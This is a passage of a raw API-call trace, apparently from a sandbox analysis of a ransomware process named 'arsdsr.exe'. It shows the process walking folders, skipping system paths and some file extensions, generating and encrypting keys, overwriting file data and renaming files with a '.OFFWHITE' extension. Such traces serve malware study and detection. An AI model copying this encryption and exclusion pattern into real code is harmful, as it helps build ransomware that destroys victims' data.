(lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.222] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.222] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.222] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.222] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295d610*=0x100) returned 1 [0144.222] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.222] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.222] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295d60c*=0x100) returned 1 [0144.223] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x400000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.223] SetLastError (dwErrCode=0x0) [0144.223] WriteFile (in: hFile=0x214, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0144.224] GetLastError () returned 0x0 [0144.224] GetLastError () returned 0x0 [0144.224] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x400100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.224] WriteFile (in: hFile=0x214, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0144.224] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x400200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.224] WriteFile (in: hFile=0x214, lpBuffer=0x52e990*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x52e990*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0144.224] GetProcessHeap () returned 0x500000 [0144.224] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2a60020 [0144.225] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.225] ReadFile (in: hFile=0x214, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d840*=0x927c0, lpOverlapped=0x0) returned 1 [0144.282] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.282] WriteFile (in: hFile=0x214, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d84c*=0x927c0, lpOverlapped=0x0) returned 1 [0144.284] GetProcessHeap () returned 0x500000 [0144.284] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0144.287] CloseHandle (hObject=0x214) returned 1 [0144.288] GetProcessHeap () returned 0x500000 [0144.288] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.288] GetProcessHeap () returned 0x500000 [0144.288] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.288] GetProcessHeap () returned 0x500000 [0144.288] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.288] GetProcessHeap () returned 0x500000 [0144.288] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.288] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" [0144.288] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.OFFWHITE" [0144.288] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat.offwhite")) returned 1 [0144.289] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2=".") returned 1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2="..") returned 1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2="...") returned 1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2="windows") returned -1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2="$recycle.bin") returned 1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2="rsa") returned -1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2="ntuser.dat") returned 1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2="programdata") returned 1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2="appdata") returned 1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2="program files") returned 1 [0144.289] lstrcmpiW (lpString1="qmgr1.dat", lpString2="program files (x86)") returned 1 [0144.289] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\" [0144.289] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="qmgr1.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" [0144.289] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.289] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.290] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".cab") returned 1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".cmd") returned 1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".com") returned 1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".cpl") returned 1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".url") returned -1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".ttf") returned -1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".mp3") returned -1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".pif") returned -1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".mp4") returned -1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".OFFWHITE") returned -1 [0144.290] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0144.290] lstrcmpiW (lpString1="qmgr1.dat", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.290] GetProcessHeap () returned 0x500000 [0144.290] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e9a0 [0144.290] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0144.291] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=4194304) returned 1 [0144.291] GetProcessHeap () returned 0x500000 [0144.291] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.291] GetProcessHeap () returned 0x500000 [0144.291] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.291] GetProcessHeap () returned 0x500000 [0144.291] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.291] GetProcessHeap () returned 0x500000 [0144.291] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.291] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.291] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.291] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.291] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.291] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.291] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.291] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.291] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.291] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295d610*=0x100) returned 1 [0144.292] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.292] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.294] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295d60c*=0x100) returned 1 [0144.294] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x400000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.294] SetLastError (dwErrCode=0x0) [0144.294] WriteFile (in: hFile=0x214, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0144.296] GetLastError () returned 0x0 [0144.296] GetLastError () returned 0x0 [0144.296] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x400100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.296] WriteFile (in: hFile=0x214, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0144.296] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x400200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.296] WriteFile (in: hFile=0x214, lpBuffer=0x52e9a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x52e9a0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0144.296] GetProcessHeap () returned 0x500000 [0144.296] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2a60020 [0144.296] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.296] ReadFile (in: hFile=0x214, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d840*=0x927c0, lpOverlapped=0x0) returned 1 [0144.344] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.344] WriteFile (in: hFile=0x214, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d84c*=0x927c0, lpOverlapped=0x0) returned 1 [0144.346] GetProcessHeap () returned 0x500000 [0144.346] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0144.349] CloseHandle (hObject=0x214) returned 1 [0144.350] GetProcessHeap () returned 0x500000 [0144.350] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.350] GetProcessHeap () returned 0x500000 [0144.350] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.350] GetProcessHeap () returned 0x500000 [0144.350] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.350] GetProcessHeap () returned 0x500000 [0144.350] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.350] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" [0144.350] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.OFFWHITE" [0144.350] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat.offwhite")) returned 1 [0144.351] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName="qmgr1.dat", cAlternateFileName="")) returned 0 [0144.351] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0144.351] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 0 [0144.351] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.351] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="OFFICE", cAlternateFileName="")) returned 1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2=".") returned 1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2="..") returned 1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2="...") returned 1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2="windows") returned -1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2="$recycle.bin") returned 1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2="rsa") returned -1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2="ntuser.dat") returned 1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2="programdata") returned -1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2="appdata") returned 1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2="program files") returned -1 [0144.351] lstrcmpiW (lpString1="OFFICE", lpString2="program files (x86)") returned -1 [0144.351] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.351] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="OFFICE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE") returned="C:/Users\\All Users\\Microsoft\\OFFICE" [0144.351] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\" [0144.351] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\" [0144.351] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\*.*") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\*.*" [0144.351] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.357] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.357] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.357] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.357] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.357] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="AssetLibrary.ico", cAlternateFileName="ASSETL~1.ICO")) returned 1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2=".") returned 1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="..") returned 1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="...") returned 1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="windows") returned -1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="$recycle.bin") returned 1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="rsa") returned -1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="ntuser.dat") returned -1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="programdata") returned -1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="appdata") returned 1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="program files") returned -1 [0144.357] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="program files (x86)") returned -1 [0144.357] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\" [0144.357] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\", lpString2="AssetLibrary.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico" [0144.357] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.357] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.357] PathFindExtensionW (pszPath="AssetLibrary.ico") returned=".ico" [0144.357] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.357] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.357] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.357] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.357] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.357] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.357] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.358] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.358] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.358] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.358] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.358] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.358] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.358] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.358] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.358] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.358] GetProcessHeap () returned 0x500000 [0144.358] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e9b0 [0144.358] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0144.359] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=5430) returned 1 [0144.359] GetProcessHeap () returned 0x500000 [0144.359] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.359] GetProcessHeap () returned 0x500000 [0144.359] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.359] GetProcessHeap () returned 0x500000 [0144.359] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.360] GetProcessHeap () returned 0x500000 [0144.360] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.360] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.360] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.360] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.360] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.360] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.360] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.361] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.361] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.361] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295dc90*=0x100) returned 1 [0144.361] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.361] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.361] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0144.361] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1536, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.361] SetLastError (dwErrCode=0x0) [0144.361] WriteFile (in: hFile=0x21c, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.365] GetLastError () returned 0x0 [0144.365] GetLastError () returned 0x0 [0144.365] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1636, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 